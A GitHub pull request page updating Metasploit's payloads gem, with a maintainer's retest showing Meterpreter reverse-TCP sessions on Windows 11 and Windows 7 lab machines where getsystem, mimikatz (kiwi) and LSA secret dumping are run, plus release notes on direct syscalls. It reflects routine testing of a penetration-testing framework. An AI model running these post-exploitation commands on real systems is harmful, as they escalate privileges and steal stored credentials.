Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Update metasploit-payloads gem to 2.0.165 #18737

Merged
merged 1 commit into from
Jan 25, 2024

Conversation

zeroSteiner
Copy link
Contributor

@zeroSteiner zeroSteiner force-pushed the fix/bump-payloads/2.0.165 branch from 1d1b268 to 7dc4116 Compare January 23, 2024 15:32
@zeroSteiner zeroSteiner force-pushed the fix/bump-payloads/2.0.165 branch from 7dc4116 to dd3d1a9 Compare January 23, 2024 15:42
@cdelafuente-r7 cdelafuente-r7 self-assigned this Jan 24, 2024
@cdelafuente-r7
Copy link
Contributor

Thanks @zeroSteiner, I did a quick retest to make sure the payload generated by automation are working as expected.

  • output using a x64 Meterpreter payload against Win11 x64 (loading extension, migrating to a x86 process, etc.)
msf6 payload(cmd/windows/powershell/x64/meterpreter/reverse_tcp) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : DESKTOP-26CQRHP
OS              : Windows 11 (10.0 Build 22000).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-26CQRHP\n00tmeg
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( [email protected] )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > lsa_dump_secrets
[+] Running as SYSTEM
[*] Dumping LSA secrets
Domain : DESKTOP-26CQRHP
SysKey : <redacted>

Local name : DESKTOP-26CQRHP ( S-1-5-21-2018954162-2495490444-3936086963 )
Domain name : WORKGROUP

Policy subsystem is : 1.18
...<redacted>...

meterpreter > migrate 3408
[*] Migrating from 2292 to 3408...
[*] Migration completed successfully.
meterpreter > sysinfo
Computer        : DESKTOP-26CQRHP
OS              : Windows 11 (10.0 Build 22000).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > lsa_dump_secrets
[+] Running as SYSTEM
[*] Dumping LSA secrets
Domain : DESKTOP-26CQRHP
SysKey : <redacted>

Local name : DESKTOP-26CQRHP ( S-1-5-21-2018954162-2495490444-3936086963 )
Domain name : WORKGROUP

Policy subsystem is : 1.18
...<redacted>...

  • output using a x86 Meterpreter payload against Win7 x86 (loading extension, etc.)
msf6 payload(cmd/windows/powershell/meterpreter/reverse_tcp) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > sysinfo
Computer        : WIN7-DEV
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: WIN7-DEV\nutmeg
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x86/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( [email protected] )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > lsa_dump_secrets
[+] Running as SYSTEM
[*] Dumping LSA secrets
Domain : DESKTOP-26CQRHP
SysKey : <redacted>

Local name : DESKTOP-26CQRHP ( S-1-5-21-2018954162-2495490444-3936086963 )
Domain name : WORKGROUP

Policy subsystem is : 1.18
...<redacted>...

meterpreter > migrate 480
[*] Migrating from 2452 to 480...
[*] Migration completed successfully.
meterpreter > lsa_dump_secrets
[+] Running as SYSTEM
[*] Dumping LSA secrets
Domain : DESKTOP-26CQRHP
SysKey : <redacted>

Local name : DESKTOP-26CQRHP ( S-1-5-21-2018954162-2495490444-3936086963 )
Domain name : WORKGROUP

Policy subsystem is : 1.18
...<redacted>...

@cdelafuente-r7 cdelafuente-r7 added the rn-enhancement release notes enhancement label Jan 25, 2024
@cdelafuente-r7 cdelafuente-r7 merged commit 44bf686 into rapid7:master Jan 25, 2024
58 checks passed
@cdelafuente-r7
Copy link
Contributor

Release Notes

This updates metasploit-payloads gem to 2.0.165 to pull in changes to support direct syscalls for Meterpreter on Windows. See this PR and this PR for details.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
rn-enhancement release notes enhancement
Projects
Archived in project
Development

Successfully merging this pull request may close these issues.

2 participants